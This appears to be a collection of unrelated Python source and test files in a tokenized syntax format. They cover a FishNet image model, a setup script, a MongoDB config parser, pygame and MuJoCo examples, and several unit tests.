"""<def_stmt>__init__ self direct_channels skip_channels init_block_channels bn_use_global_stats=<false> in_channels=3 in_size=(224 224) classes=1000 **kwargs<block_start>super(FishNet self).__init__(**kwargs)<line_sep>self.in_size=in_size<line_sep>self.classes=classes<line_sep>depth=len(direct_channels[0])<line_sep>down1_channels=direct_channels[0]<line_sep>up_channels=direct_channels[1]<line_sep>down2_channels=direct_channels[2]<line_sep>skip1_channels=skip_channels[0]<line_sep>skip2_channels=skip_channels[1]<with_stmt>self.name_scope()<block_start>self.features=nn.HybridSequential(prefix="")<line_sep>self.features.add(SEInitBlock(in_channels=in_channels out_channels=init_block_channels bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=init_block_channels<line_sep>down1_seq=nn.HybridSequential(prefix="")<line_sep>skip1_seq=nn.HybridSequential(prefix="")<for_stmt>i range(depth+1)<block_start>skip1_channels_list=skip1_channels[i]<if_stmt>i<l>depth<block_start>skip1_seq.add(SkipUnit(in_channels=in_channels out_channels_list=skip1_channels_list bn_use_global_stats=bn_use_global_stats))<line_sep>down1_channels_list=down1_channels[i]<line_sep>down1_seq.add(DownUnit(in_channels=in_channels out_channels_list=down1_channels_list bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=down1_channels_list[-1]<block_end><else_stmt><block_start>skip1_seq.add(SkipAttUnit(in_channels=in_channels out_channels_list=skip1_channels_list bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=skip1_channels_list[-1]<block_end><block_end>up_seq=nn.HybridSequential(prefix="")<line_sep>skip2_seq=nn.HybridSequential(prefix="")<for_stmt>i range(depth+1)<block_start>skip2_channels_list=skip2_channels[i]<if_stmt>i<g>0<block_start>in_channels<augadd>skip1_channels[depth-i][-1]<block_end><if_stmt>i<l>depth<block_start>skip2_seq.add(SkipUnit(in_channels=in_channels out_channels_list=skip2_channels_list bn_use_global_stats=bn_use_global_stats))<line_sep>up_channels_list=up_channels[i]<line_sep>dilation=2<power>i<line_sep>up_seq.add(UpUnit(in_channels=in_channels out_channels_list=up_channels_list dilation=dilation bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=up_channels_list[-1]<block_end><else_stmt><block_start>skip2_seq.add(Identity())<block_end><block_end>down2_seq=nn.HybridSequential(prefix="")<for_stmt>i range(depth)<block_start>down2_channels_list=down2_channels[i]<line_sep>down2_seq.add(DownUnit(in_channels=in_channels out_channels_list=down2_channels_list bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=down2_channels_list[-1]+skip2_channels[depth-1-i][-1]<block_end>self.features.add(SesquialteralHourglass(down1_seq=down1_seq skip1_seq=skip1_seq up_seq=up_seq skip2_seq=skip2_seq down2_seq=down2_seq))<line_sep>self.features.add(FishFinalBlock(in_channels=in_channels bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=in_channels<floordiv>2<line_sep>self.features.add(nn.AvgPool2D(pool_size=7 strides=1))<line_sep>self.output=nn.HybridSequential(prefix="")<line_sep>self.output.add(conv1x1(in_channels=in_channels out_channels=classes use_bias=<true>))<line_sep>self.output.add(nn.Flatten())<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.features(x)<line_sep>x=self.output(x)<line_sep><return>x<block_end><block_end><def_stmt>get_fishnet blocks model_name=<none> pretrained=<false> ctx=cpu() root=os.path.join("~" ".mxnet" "models") **kwargs<block_start>"""
Create FishNet model with specific parameters.
Parameters:
----------
blocks : int
Number of blocks.
model_name : str or None, default None
Model name for loading pretrained model.
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""<if_stmt>blocks<eq>99<block_start>direct_layers=[[2 2 6] [1 1 1] [1 2 2]]<line_sep>skip_layers=[[1 1 1 2] [4 1 1 0]]<block_end><elif_stmt>blocks<eq>150<block_start>direct_layers=[[2 4 8] [2 2 2] [2 2 4]]<line_sep>skip_layers=[[2 2 2 4] [4 2 2 0]]<block_end><else_stmt><block_start><raise>ValueError("Unsupported FishNet with number of blocks: {}".format(blocks))<block_end>direct_channels_per_layers=[[128 256 512] [512 384 256] [320 832 1600]]<line_sep>skip_channels_per_layers=[[64 128 256 512] [512 768 512 0]]<line_sep>direct_channels=[[[b]<times>c<for>(b c) zip(*a)]<for>a ([(ci li)<for>(ci li) zip(direct_channels_per_layers direct_layers)])]<line_sep>skip_channels=[[[b]<times>c<for>(b c) zip(*a)]<for>a ([(ci li)<for>(ci li) zip(skip_channels_per_layers skip_layers)])]<line_sep>init_block_channels=64<line_sep>net=FishNet(direct_channels=direct_channels skip_channels=skip_channels init_block_channels=init_block_channels **kwargs)<if_stmt>pretrained<block_start><if_stmt>(model_name<is><none>)<or>(<not>model_name)<block_start><raise>ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")<block_end><import_from_stmt>.model_store get_model_file<line_sep>net.load_parameters(filename=get_model_file(model_name=model_name local_model_store_dir_path=root) ctx=ctx)<block_end><return>net<block_end><def_stmt>fishnet99 **kwargs<block_start>"""
FishNet-99 model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""<line_sep><return>get_fishnet(blocks=99 model_name="fishnet99" **kwargs)<block_end><def_stmt>fishnet150 **kwargs<block_start>"""
FishNet-150 model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
ctx : Context, default CPU
The context in which to load the pretrained weights.
root : str, default '~/.mxnet/models'
Location for keeping the model parameters.
"""<line_sep><return>get_fishnet(blocks=150 model_name="fishnet150" **kwargs)<block_end><def_stmt>_test <block_start><import_stmt>numpy<as>np<import_stmt>mxnet<as>mx<line_sep>pretrained=<false><line_sep>models=[fishnet99 fishnet150 ]<for_stmt>model models<block_start>net=model(pretrained=pretrained)<line_sep>ctx=mx.cpu()<if_stmt><not>pretrained<block_start>net.initialize(ctx=ctx)<block_end># net.hybridize()
net_params=net.collect_params()<line_sep>weight_count=0<for_stmt>param net_params.values()<block_start><if_stmt>(param.shape<is><none>)<or>(<not>param._differentiable)<block_start><continue><block_end>weight_count<augadd>np.prod(param.shape)<block_end>print("m={}, {}".format(model.__name__ weight_count))<assert_stmt>(model<ne>fishnet99<or>weight_count<eq>16628904)<assert_stmt>(model<ne>fishnet150<or>weight_count<eq>24959400)<line_sep>x=mx.nd.zeros((1 3 224 224) ctx=ctx)<line_sep>y=net(x)<assert_stmt>(y.shape<eq>(1 1000))<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>_test()<block_end>
|
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Setup for DP Learning package."""<import_stmt>os<import_stmt>setuptools<line_sep>here=os.path.dirname(os.path.abspath(__file__))<def_stmt>_parse_requirements path<block_start>"""Parses requirements from file."""<with_stmt>open(os.path.join(here path))<as>f<block_start><return>[line.rstrip()<for>line f]+["dp-accounting"]<block_end><block_end>setuptools.setup(name="dp-learning" author="Google Differential Privacy Team" author_email="<EMAIL>" description="Differential privacy learning algorithms" long_description_content_type="text/markdown" url="https://github.com/google/differential-privacy/" packages=setuptools.find_packages() install_requires=_parse_requirements("requirements.txt") classifiers=["Programming Language :: Python :: 3.7" "Programming Language :: Python :: 3.8" "Programming Language :: Python :: 3.9" "Topic :: Software Development :: Libraries :: Python Modules" ] python_requires=">=3.7" license="Apache 2.0" keywords="differential-privacy clustering" )<line_sep>
|
<import_stmt>numpy<as>np<import_stmt>hashlib<import_from_stmt>collections OrderedDict<import_from_stmt>mujoco_worldgen.objs.obj Obj<import_from_stmt>mujoco_worldgen.util.types store_args<class_stmt>Material(Obj)<block_start>placeable=<false><line_sep>@store_args<def_stmt>__init__ self random=<true> rgba=<none> texture=<none> texture_type=<none> grid_layout=<none> grid_size=<none><block_start>super(Material self).__init__()<block_end><def_stmt>generate self random_state world_params placement_size=<none><block_start><if_stmt><not>world_params.randomize_material<block_start>deterministic_seed=int(hashlib.sha1(self.name.encode()).hexdigest() 16)<line_sep>random_state=np.random.RandomState(deterministic_seed%100000)<block_end>choice=random_state.randint(0 3)<line_sep>self.xml_dict=<none><if_stmt>self.texture<is><not><none><block_start>self.xml_dict=self._material_texture(random_state self.texture self.texture_type self.grid_layout self.grid_size self.rgba)<block_end><elif_stmt>self.rgba<is><not><none><block_start>self.xml_dict=self._material_rgba(random_state self.rgba)<block_end><elif_stmt>self.xml_dict<is><none><block_start>self.xml_dict=[self._material_rgba self._material_checker self._material_random][choice](random_state)<block_end>self.xml_dict=OrderedDict(asset=self.xml_dict)<block_end><def_stmt>generate_xml_dict self<block_start><return>self.xml_dict<block_end><def_stmt>_material_rgba self random_state rgba=<none><block_start>material_attrs=OrderedDict([('@name' self.name) ('@specular' 0.1+0.2<times>random_state.uniform()) ('@shininess' 0.1+0.2<times>random_state.uniform()) ('@reflectance' 0.1+0.2<times>random_state.uniform())])<if_stmt>rgba<is><none><block_start>material_attrs['@rgba']=0.1+0.8<times>random_state.uniform(size=4)<line_sep>material_attrs['@rgba'][3]=1.0<block_end><elif_stmt>isinstance(rgba tuple)<and>len(rgba)<eq>2<block_start>material_attrs['@rgba']=random_state.uniform(rgba[0] rgba[1])<block_end><else_stmt><block_start>material_attrs['@rgba']=rgba<block_end><return>OrderedDict(material=[material_attrs])<block_end><def_stmt>_material_checker self random_state<block_start>texture_attr=OrderedDict([('@name' "texture_"+self.name) ('@builtin' 'checker') ('@height' random_state.randint(5 100)) ('@width' random_state.randint(5 100)) ('@type' '2d') ('@rgb1' [0 0 0])])<line_sep>texture_attr['@rgb2']=0.1+0.8<times>random_state.uniform(size=3)<line_sep>xml_dict=OrderedDict(texture=[texture_attr])<line_sep>texrepeat=[random_state.randint(5 100) random_state.randint(5 100)]<line_sep>xml_dict["material"]=[OrderedDict([('@name' self.name) ('@texrepeat' texrepeat) ('@texture' "texture_"+self.name)])]<line_sep><return>xml_dict<block_end><def_stmt>_material_random self random_state<block_start>random=0.1+0.8<times>random_state.uniform()<line_sep>texture_attr=OrderedDict([('@name' "texture_"+self.name) ('@builtin' 'flat') ('@mark' 'random') ('@type' '2d') ('@height' 2048) ('@width' 2048) ('@rgb1' [1 1 1]) ('@rgb2' [1 1 1]) ('@random' random)])<line_sep>material=OrderedDict([('@name' self.name) ('@texture' "texture_"+self.name)])<line_sep>xml_dict=OrderedDict([('texture' [texture_attr]) ('material' [material])])<line_sep><return>xml_dict<block_end><def_stmt>_material_texture self random_state texture texture_type=<none> grid_layout=<none> grid_size=<none> rgba=<none><block_start>texture_attr=OrderedDict([('@name' "texture_"+self.name) ('@type' '2d') ('@builtin' 'none') ('@file' texture) ])<if_stmt>texture_type<is><none><block_start>texture_type="cube"<block_end>texture_attr["@type"]=texture_type<if_stmt>texture_type<eq>"cube"<block_start>texture_attr["@gridlayout"]='.U..LFRB.D..'<if>grid_layout<is><none><else>grid_layout<line_sep>texture_attr["@gridsize"]='3 4'<if>grid_size<is><none><else>grid_size<block_end>material=OrderedDict([('@name' self.name) ('@texture' "texture_"+self.name) ])<if_stmt>rgba<is><not><none><block_start>material['@rgba']=rgba<block_end><return>OrderedDict([('texture' [texture_attr]) ('material' [material]) ])<block_end><block_end>
|
"""
MongodbConf - files - Configuration files for MongoDB
=====================================================
This module contains the following files:
``/etc/mongod.conf``,
``/etc/mongodb.conf`` ,
``/etc/opt/rh/rh-mongodb26/mongod.conf``
``/etc/opt/rh/rh-mongodb34/mongod.conf``
They are provided by package mongodb-server, rh-mongodb26-mongodb-server or
rh-mongodb34-mongodb-server.
These MongoDB configuration files may use the **YAML** format
or the standard **key-value pair** format.
Sample input(YAML format)::
systemLog:
destination: file
logAppend: true
path: /var/log/mongodb/mongod.log
# Where and how to store data.
storage:
dbPath: /var/lib/mongo
journal:
enabled: true
Sample input(key-value pair format)::
# mongodb.conf - generated from Puppet
#where to log
logpath=/var/log/mongodb/mongodb.log
logappend=true
# Set this option to configure the mongod or mongos process to bind to and
# listen for connections from applications on this address.
# You may concatenate a list of comma separated values to bind mongod to multiple IP addresses.
bind_ip = 127.0.0.1
# fork and run in background
fork=true
dbpath=/var/lib/mongodb
# location of pidfile
pidfilepath=/var/run/mongodb/mongodb.pid
# Enables journaling
journal = true
# Turn on/off security. Off is currently the default
noauth=true
Examples:
>>> mongod_conf1 = shared[MongodConf]
>>> mongod_conf2 = shared[MongodConf]
>>> MongodbConf1.is_yaml
True
>>> MongodbConf2.is_yaml
False
>>> mongod_conf1.fork
True
>>> mongod_conf2.fork
'true'
>>> mongod_conf1.dbpath
'/var/lib/mongo'
>>> mongod_conf2.dbpath
'/var/lib/mongo'
>>> mongod_conf1.get("systemlog", {}).get("logAppend")
True
>>> MongodbConf2.get("logappend")
'true'
"""<import_stmt>yaml<import_from_stmt>.. parser Parser LegacyItemAccess get_active_lines<import_from_stmt>..parsers ParseException split_kv_pairs<import_from_stmt>..specs Specs<line_sep>@parser(Specs.mongod_conf)<class_stmt>MongodbConf(Parser LegacyItemAccess)<block_start>"""
Parse the ``/etc/mongod.conf`` config file in key-value pair or YAML format.
Make several frequently used config options as properties.
Raises:
ParseException: Raised when any problem parsing the file content.
Attributes:
is_yaml (boolean): True if this is a yaml format file.
"""<def_stmt>parse_content self content<block_start>a_content=get_active_lines(content)<if_stmt><not>a_content<block_start><raise>ParseException("mongod.conf is empty or all lines are comments")<block_end>self.is_yaml=self._file_type_is_yaml(a_content)<try_stmt><block_start><if_stmt>self.is_yaml<block_start>self.data=yaml.safe_load('\n'.join(content))<block_end><else_stmt><block_start>self.data=split_kv_pairs(content use_partition=<true>)<block_end><block_end><except_stmt>Exception<as>e<block_start><raise>ParseException('mongod conf parse failed: %s' e)<block_end><block_end><def_stmt>_file_type_is_yaml self content<block_start>"""
Return True if the file type is YAML.
Return False means this file will be handled in key-value pair format.
Why 0.9?
The normal key-value pair format file would always has the '='
in each line. Use 0.9 rather than 1 here, just in case there're
any unexpected lines with wrong settings.
"""<line_sep>cnt=sum([1<for>line content<if>"="<in>line])<line_sep>percent=float(cnt)/len(content)<line_sep><return><true><if>percent<l>0.9<else><false><block_end>@property<def_stmt>bindip self<block_start>"""
Return option value of `net.bindIp` if a yaml conf and `bind_ip` if a
key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('net' {}).get('bindIp')<block_end><else_stmt><block_start><return>self.get('bind_ip')<block_end><block_end>@property<def_stmt>port self<block_start>"""
Return option value of `net.port` if a yaml conf and `port` if a
key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('net' {}).get('port')<block_end><else_stmt><block_start><return>self.get('port')<block_end><block_end>@property<def_stmt>dbpath self<block_start>"""
Return option value of `storage.dbPath` if a yaml conf and `dbPath`
if a key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('storage' {}).get('dbPath')<or>self.get('storage.dbPath')<block_end><else_stmt><block_start><return>self.get('dbpath')<block_end><block_end>@property<def_stmt>fork self<block_start>"""
Return option value of `processManagement.fork` if a yaml conf and
`fork` if a key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('processManagement' {}).get('fork')<block_end><else_stmt><block_start><return>self.get('fork')<block_end><block_end>@property<def_stmt>pidfilepath self<block_start>"""
Return option value of `processManagement.pidFilePath` if a yaml conf
and `pidFilePath` if a key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('processManagement' {}).get('pidFilePath')<block_end><else_stmt><block_start><return>self.get('pidfilepath')<block_end><block_end>@property<def_stmt>syslog self<block_start>"""
Return option value of `systemLog.destination` if a yaml conf, this
can be 'file' or 'syslog'. Return value of `syslog` if a key-value pair
conf, 'true' means log to syslog.
Return None means value is not specified in configuration file.
"""<if_stmt>self.is_yaml<block_start><return>self.get('systemLog' {}).get('destination')<block_end><else_stmt><block_start><return>self.get('syslog')<block_end><block_end>@property<def_stmt>logpath self<block_start>"""
Return option value of `systemLog.path` if a yaml conf and `logpath`
if a key-value pair conf.
"""<if_stmt>self.is_yaml<block_start><return>self.get('systemLog' {}).get('path')<block_end><else_stmt><block_start><return>self.get('logpath')<block_end><block_end><block_end>
|
<import_from_stmt>unittest TestCase<import_from_stmt>nanoid.resources alphabet<class_stmt>TestURL(TestCase)<block_start><def_stmt>test_has_no_duplicates self<block_start><for_stmt>i range(len(alphabet))<block_start>self.assertEqual(alphabet.rindex(alphabet[i]) i)<block_end><block_end><def_stmt>test_is_string self<block_start>self.assertEqual(type(alphabet) str)<block_end><block_end>
|
<import_stmt>json<import_stmt>mock<import_from_stmt>django.core.urlresolvers reverse<import_from_stmt>ide.utils.cloudpebble_test CloudpebbleTestCase<import_from_stmt>utils.fakes FakeS3<line_sep>__author__='joe'<line_sep>fake_s3=FakeS3()<line_sep>@mock.patch('ide.models.s3file.s3' fake_s3)<class_stmt>TestSource(CloudpebbleTestCase)<block_start>"""Tests for the Tests models"""<def_stmt>setUp self<block_start>self.login()<block_end><def_stmt>create_file self name='file.c' content=<none> target=<none> success=<true><block_start>""" Create a source file """<line_sep>url=reverse('ide:create_source_file' args=[self.project_id])<line_sep>data={}<if_stmt>name<is><not><none><block_start>data['name']=name<block_end><if_stmt>content<is><not><none><block_start>data['content']=content<block_end><if_stmt>target<is><not><none><block_start>data['target']=target<block_end>result=json.loads(self.client.post(url data).content)<line_sep>self.assertEqual(result['success'] success)<if_stmt>success<block_start>self.assertEqual(result['file']['name'] name)<line_sep>self.assertEqual(result['file']['target'] target<if>target<else>'app')<block_end><return>result['file']<if>'file'<in>result<else>result<block_end><def_stmt>load_file self id success=<true><block_start>""" Load a source file's content """<line_sep>url=reverse('ide:load_source_file' args=[self.project_id id])<line_sep>result=json.loads(self.client.get(url).content)<line_sep>self.assertEqual(result['success'] success)<line_sep><return>result<block_end><def_stmt>rename_file self id modified old_name=<none> new_name=<none> success=<true><block_start>""" Rename a source file """<line_sep>url=reverse('ide:rename_source_file' args=[self.project_id id])<line_sep>data={}<if_stmt>old_name<is><not><none><block_start>data['old_name']=old_name<block_end><if_stmt>new_name<is><not><none><block_start>data['new_name']=new_name<block_end><if_stmt>modified<is><not><none><block_start>data['modified']=modified<block_end>result=json.loads(self.client.post(url data).content)<line_sep>self.assertEqual(result['success'] success)<line_sep><return>result<block_end><def_stmt>save_file self id modified content=<none> folded_lines='[]' success=<true><block_start>""" Save new content to a source file """<line_sep>data={}<if_stmt>content<is><not><none><block_start>data['content']=content<block_end><if_stmt>folded_lines<is><not><none><block_start>data['folded_lines']=folded_lines<block_end><if_stmt>modified<is><not><none><block_start>data['modified']=modified<block_end>url=reverse('ide:save_source_file' args=[self.project_id id])<line_sep>result=json.loads(self.client.post(url data).content)<line_sep>self.assertEqual(result['success'] success)<line_sep><return>result<block_end><def_stmt>get_source_names self<block_start>""" Get a list of project source file names """<line_sep>project=json.loads(self.client.get(reverse('ide:project_info' args=[self.project_id])).content)<line_sep><return>{x['name']<for>x project['source_files']}<block_end><def_stmt>test_create self<block_start>""" Test creating files in various valid states """<line_sep>self.create_file("c_file.c")<line_sep>self.create_file("js_file.js")<line_sep>self.create_file("with_content.c" content="blah"<times>100)<line_sep>self.create_file("without_content.c" content=<none>)<line_sep>self.create_file("worker.c" target='worker')<block_end><def_stmt>test_create_load_save self<block_start>""" Test a full sequence of creating, loading, saving and re-loading a file"""<line_sep>content=" Hello world ^^ "<line_sep>new_content="New content"<line_sep>info=self.create_file(content=content)<line_sep>loaded=self.load_file(info['id'])<line_sep>self.assertEqual(content loaded['source'])<line_sep>self.save_file(info['id'] int(loaded['modified']) content=new_content)<line_sep>loaded=self.load_file(info['id'])<line_sep>self.assertEqual(new_content loaded['source'])<block_end><def_stmt>test_create_with_invalid_target_throws_error self<block_start>""" Test that attempting to create a file with an invalid target throws an error """<line_sep>self.create_file(target='invalid' success=<false>)<block_end><def_stmt>test_create_with_invalid_names_throws_error self<block_start>""" Check that attempts to create files with invalid names throw errors """<line_sep>self.create_file("no_extension" success=<false>)<line_sep>self.create_file("no_extension" success=<false>)<line_sep>self.create_file("bad_extension.html" success=<false>)<line_sep>self.create_file(".c" success=<false>)<line_sep>self.create_file("`unsafe characters`.c" success=<false>)<block_end><def_stmt>test_rename self<block_start>""" Check that files can be renamed """<line_sep>name1="name1.c"<line_sep>name2="name2.c"<line_sep>info=self.create_file(name1)<line_sep>loaded=self.load_file(info['id'])<line_sep>self.rename_file(info['id'] int(loaded['modified']) name1 name2)<line_sep>self.assertIn(name2 self.get_source_names())<block_end><def_stmt>test_rename_outdated_file_fails self<block_start>""" Check that a file which was modified externally fails to rename """<line_sep>name1="name1.c"<line_sep>name2="name2.c"<line_sep>info=self.create_file(name1)<line_sep>loaded=self.load_file(info['id'])<line_sep>self.rename_file(info['id'] int(loaded['modified']-5000) name1 name2 success=<false>)<line_sep>self.assertIn(name1 self.get_source_names())<block_end><block_end>
|
"""
pygame-menu
https://github.com/ppizarror/pygame-menu
EXAMPLE - WINDOW RESIZE
Resize the menu when the window is resized.
License:
-------------------------------------------------------------------------------
The MIT License (MIT)
Copyright 2017-2021 <NAME>. @ppizarror
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-------------------------------------------------------------------------------
"""<import_stmt>pygame<import_stmt>pygame_menu<line_sep>pygame.init()<line_sep>surface=pygame.display.set_mode((600 400) pygame.RESIZABLE)<line_sep>pygame.display.set_caption("Example resizable window")<line_sep>menu=pygame_menu.Menu(height=100 theme=pygame_menu.themes.THEME_BLUE title='Welcome' width=100)<def_stmt>on_resize <arrow><none><block_start>"""
Function checked if the window is resized.
"""<line_sep>window_size=surface.get_size()<line_sep>new_w,new_h=0.75<times>window_size[0] 0.7<times>window_size[1]<line_sep>menu.resize(new_w new_h)<line_sep>print(f'New menu size: {menu.get_size()}')<block_end>menu.add.label('Resize the window!')<line_sep>user_name=menu.add.text_input('Name: ' default='<NAME>' maxchar=10)<line_sep>menu.add.selector('Difficulty: ' [('Hard' 1) ('Easy' 2)])<line_sep>menu.add.button('Quit' pygame_menu.events.EXIT)<line_sep>menu.enable()<line_sep>on_resize()# Set initial size
<if_stmt>__name__<eq>'__main__'<block_start><while_stmt><true><block_start>events=pygame.event.get()<for_stmt>event events<block_start><if_stmt>event.type<eq>pygame.QUIT<block_start>pygame.quit()<line_sep><break><block_end><if_stmt>event.type<eq>pygame.VIDEORESIZE# Update the surface
<block_start>surface=pygame.display.set_mode((event.w event.h) pygame.RESIZABLE)<line_sep># Call the menu event
on_resize()<block_end><block_end># Draw the menu
surface.fill((25 0 50))<line_sep>menu.update(events)<line_sep>menu.draw(surface)<line_sep>pygame.display.flip()<block_end><block_end>
|
<import_stmt>pytest<import_from_stmt>tests.models EmployeeInfo<line_sep>@pytest.mark.asyncio<async_keyword><def_stmt>test_model_counting loaded_database_and_model<block_start>db,Employees=loaded_database_and_model<line_sep>all_employees=<await>Employees.all()<line_sep>employee_count=<await>Employees.count()<line_sep>print(f"Number of Employees is " employee_count)<assert_stmt>employee_count<eq>len(all_employees)<line_sep>employed=<await>Employees.filter(is_employed=<true>)<line_sep>employed_count=<await>Employees.filter(is_employed=<true> count_rows=<true> )<assert_stmt>len(employed)<eq>employed_count<line_sep>un_employed=<await>Employees.filter(is_employed=<false> count_rows=<true>)<assert_stmt>un_employed<eq>0<block_end>
|
<import_stmt>os<import_stmt>sys<line_sep>sys.path.append('../../common')<import_from_stmt>env_indigo *<import_from_stmt>itertools product<line_sep>indigo=Indigo()<def_stmt>getProduct reaction<block_start><for_stmt>mol reaction.iterateProducts()<block_start><return>mol<block_end><return><none><block_end><def_stmt>loadSdf sdf_path<block_start>sdfiterator=indigo.iterateSDFile(sdf_path)<line_sep>result=[m.clone()<for>m sdfiterator]<line_sep>sdfiterator.dispose()<line_sep><return>result<block_end><def_stmt>buildRpeReactions test_dir<block_start>reaction=indigo.loadQueryReactionFromFile(joinPathPy(os.path.join("tests" test_dir "reaction.rxn") __file__))<line_sep>mons=[]<for_stmt>i range(reaction.countReactants())<block_start>reactant_mons=loadSdf(joinPathPy(os.path.join("tests" test_dir "mons{0}.sdf".format(i+1)) __file__))<line_sep>mons.append(reactant_mons)<block_end><return>indigo.reactionProductEnumerate(reaction mons)<block_end><def_stmt>testRpe <block_start><for_stmt>test_dir sorted(os.listdir(joinPathPy("tests" __file__)))<block_start>print("Test %s"%test_dir)<line_sep>rpe_reactions=buildRpeReactions(test_dir)<line_sep>products_smiles=[]<for_stmt>reaction rpe_reactions.iterateArray()<block_start>rpe_product=getProduct(reaction)<line_sep>rpe_csmiles=rpe_product.canonicalSmiles()<line_sep>products_smiles.append(rpe_csmiles)<block_end>products_smiles.sort()<for_stmt>prod_sm products_smiles<block_start>print(" %s"%prod_sm)<block_end><block_end><block_end># make possible options combintation
opset=[product(["rpe-multistep-reactions"] ["0" "1"]) # bug was caused by 1 \
product(["rpe-mode"] ["grid" "one-tube"]) product(["rpe-self-reaction"] ["0" "1"]) product(["rpe-max-depth"] ["1" "3"]) product(["rpe-max-products-count"] ["4" "10"])# 10 -> 100 very long \
]<line_sep># example with bug for test #9
# opset = [ [ ("rpe-multistep-reactions", "1") ] ]
opt_combintations=product(*opset)<line_sep>print("Testing reaction products enumberator with different options")<for_stmt>opt_set opt_combintations<block_start>print("\n*** Test set ***")<for_stmt>opt_tuple opt_set<block_start>print(opt_tuple)<line_sep>indigo.setOption(*opt_tuple)<block_end>testRpe()<block_end>
|
# Copyright Istio Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_from_stmt>prometheus_client start_http_server Counter Gauge<import_stmt>logging<line_sep>REQUESTS=Counter('stability_outgoing_requests' 'Number of requests from this service.' ['source' 'destination' 'succeeded'])<line_sep>RUNNING=Gauge('stability_test_instances' 'Is this test running' ['test'])<def_stmt>report_metrics <block_start>start_http_server(8080)<block_end><def_stmt>report_running test<block_start>RUNNING.labels(test).set_function(<lambda>:1)<block_end><def_stmt>attempt_request f source destination valid=<none><block_start><try_stmt><block_start>response=f()<if_stmt><not>valid<or>valid(response)<block_start>succeeded=<true><block_end><else_stmt><block_start>succeeded=<false><line_sep>logging.error("Request from {} to {} had invalid response: {}".format(source destination response))<block_end>REQUESTS.labels(source destination succeeded).inc()<line_sep><return>response succeeded<block_end><except_stmt>BaseException<block_start>logging.exception("Request from {} to {} had an exception".format(source destination))<line_sep>REQUESTS.labels(source destination <false>).inc()<line_sep><return><none> <false><block_end><block_end>
|
<import_from_stmt>rfhub.blueprints.api blueprint<as>api<import_from_stmt>rfhub.blueprints.dashboard blueprint<as>dashboard<import_from_stmt>rfhub.blueprints.doc blueprint<as>doc<line_sep>
|
<import_stmt>pytest<line_sep>NOTEBOOK_PATH='no_metadata.ipynb'<line_sep>@pytest.fixture<def_stmt>non_existing_notebook_metadata base_url<block_start><return>base_url+f'voila/render/{NOTEBOOK_PATH}'<block_end>@pytest.fixture<def_stmt>voila_args notebook_directory voila_args_extra<block_start><return>['--VoilaTest.root_dir=%r'%notebook_directory]+voila_args_extra<block_end><async_keyword><def_stmt>test_non_existing_metadata http_server_client non_existing_notebook_metadata<block_start>response=<await>http_server_client.fetch(non_existing_notebook_metadata)<assert_stmt>response.code<eq>200<assert_stmt>'Executing without notebook metadata'<in>response.body.decode('utf-8')<block_end>
|
